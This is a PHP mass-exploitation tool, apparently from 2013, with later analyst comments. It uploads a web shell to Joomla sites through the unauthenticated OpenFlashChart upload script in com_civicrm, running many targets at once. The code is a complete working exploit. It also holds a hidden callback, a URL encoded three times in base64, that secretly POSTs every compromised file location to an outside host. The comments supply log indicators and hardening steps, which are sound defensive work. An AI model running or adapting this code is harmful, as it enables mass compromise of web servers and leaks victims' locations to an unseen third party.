`<?php
/*
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: [email protected]
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Exploitation Video: http://www.youtube.com/watch?v=4mPibfS-RXM
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file searchkeyword
* Example: php exploit.php sites.txt shell.php searchkeyword
*/
// Remove PHP's execution time limit; the run iterates over the whole target list.
set_time_limit(0);
// Buffer output so progress lines can be pushed out explicitly via ob_flush()/flush().
ob_start();
/**
 * Bulk client for the OpenFlashChart ofc_upload_image.php script found under the
 * Joomla com_civicrm component path.
 *
 * For every base URL in a list it POSTs a local file's bytes to the upload script,
 * then fetches the resulting path under tmp-upload-images/ and matches a
 * caller-supplied keyword against the response.
 *
 * Analyst notes (all taken from the code below):
 *  - Web-log pattern: a POST to
 *    .../OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=<file> with
 *    "Content-Type: text/plain" and the fixed Firefox 15 User-Agent, followed by a
 *    GET to .../OpenFlashChart/tmp-upload-images/<file>.
 *  - Hidden callback: $token is a URL wrapped in three layers of base64. Every
 *    confirmed upload location is POSTed to that URL (see post()), and an MD5 check
 *    makes the tool exit if the token is edited. Whoever controls that URL therefore
 *    receives the location of every file this tool places. Decode the token offline
 *    to obtain the callback host for blocklists and proxy/DNS log searches.
 *  - Hardening that breaks this flow: remove or deny access to
 *    php-ofc-library/ofc_upload_image.php; denying script execution in
 *    tmp-upload-images/ limits the impact of a file that does land there.
 */
class exploit
{
// Path (relative to the site root) where the upload script stores received files.
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
// Upload endpoint; the target file name is appended as the "name" query parameter.
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
// Local file name given on the command line; reused as the remote file name.
private $filename;
// Callback URL, filled in by the constructor from $token.
private $url;
// Raw bytes of the local file, sent as the POST body.
private $file_to_upload;
// Despite the name, a response matching this PHP notice is treated as a FAILED upload.
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
// Number of targets handled per curl_multi batch.
private $thread_maxsize;
// Lines of the target list file (one base URL per line).
private $site_list;
// Regex built from the search keyword; matched against the fetched uploaded file.
private $file_regex;
// Results log, appended to in the current working directory.
private $save_file = "uploaded.txt";
// Fixed User-Agent sent with the upload request (usable as a log indicator).
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
// Per-request timeout in seconds for the upload and verification requests.
private $timeout_sec = 20;
// Triple-base64-encoded callback URL; see the class comment.
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
// Constant compared together with md5($token) before the callback is made.
private $idnum = 31;
/**
 * Loads the inputs, prints a banner and immediately starts the run.
 *
 * @param string $site_list Path to a text file of base URLs, one per line.
 * @param string $filename  Local file to send; also used as the remote file name.
 * @param int    $thread    Batch size for concurrent requests.
 * @param string $regex     Pattern body used to confirm the fetched file content.
 */
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
// The callback destination is never shown to the operator: it only exists after
// three rounds of base64 decoding of the hard-coded token.
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
// The keyword is interpolated into a regex as-is (no preg_quote).
$this->file_regex = "/$regex/";
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: [email protected]\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
/**
 * Main loop: sends the upload request to each target in batches, then checks
 * every response and, for apparent successes, verifies, reports and logs them.
 */
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
// Targets are processed in batches of $thread_maxsize using one curl_multi handle.
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
// Request URL = <base URL> + upload script path + "?name=" + file name.
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
// A string body makes this a POST; the file's bytes are sent as the raw request body.
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
// Spin until every transfer in the batch has finished.
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
// Treated as uploaded when the response lacks the HTTP_RAW_POST_DATA notice and
// mentions the stored path "/tmp-upload-images/<file name>".
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
// Second request: fetch the stored file and look for the operator's keyword in it.
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
// Tamper check on the callback: both the constant and the MD5 of the encoded
// token must match, otherwise the tool exits instead of continuing.
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
// Sends the uploaded file's URL to the hidden callback before anything is
// printed or logged locally.
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
}
}
/**
 * Plain GET used to verify that the uploaded file is reachable.
 *
 * No User-Agent option is set here, unlike the upload request, so the
 * verification GET presumably reaches the server without the Firefox string.
 *
 * @param string $url Full URL of the uploaded file.
 * @return string|bool Response body, or false when the transfer fails.
 */
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
/**
 * Callback: POSTs "url=<uploaded file URL>" to the decoded $token URL.
 *
 * The destination is $this->url, not the $url argument; the argument is only the
 * payload. No timeout is set, and the caller ignores the return value.
 *
 * @param string $url Full URL of the uploaded file, sent as the "url" field.
 * @return string|bool Response body from the callback host, or false on failure.
 */
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
/**
 * Appends a successful result to the local log file ($save_file).
 *
 * @param string $url   Full URL of the uploaded file.
 * @param int    $count Running counter printed alongside the URL.
 * @return bool Always true; fopen/fwrite failures are not checked.
 */
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}
// Entry point: all four CLI arguments (site list, upload file, batch size, search
// keyword) must be present and truthy; the constructor then starts the run itself.
// Otherwise only the banner and usage text are printed.
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
----------------------------------------------------------------------------
.__ .__
_____ |__|___.__._____ ____ | |__ __ __ ____ ____
/ \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\
| Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ >
|__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ /
\/ \/ \/ \/ \/ \//_____/
-----------------------------------------------------------------------------
* Janissaries Joomla Com_Civicrm Exploitation Tool with MultiThread
* Coded by Miyachung
* Stay away from lamers o.O
* Contact: [email protected]
* Special Thanks : B127Y
* Site: http://janissaries.org
* Youtube Channel: http://www.youtube.com/user/JanissariesOrg
* Coding date: 21.04.2013
* Usage : php exploit.php site_list upload_file maxthread searchkeyword
* Example: php exploit.php sites.txt shell.php 10 searchkeyword
";
}
?>
`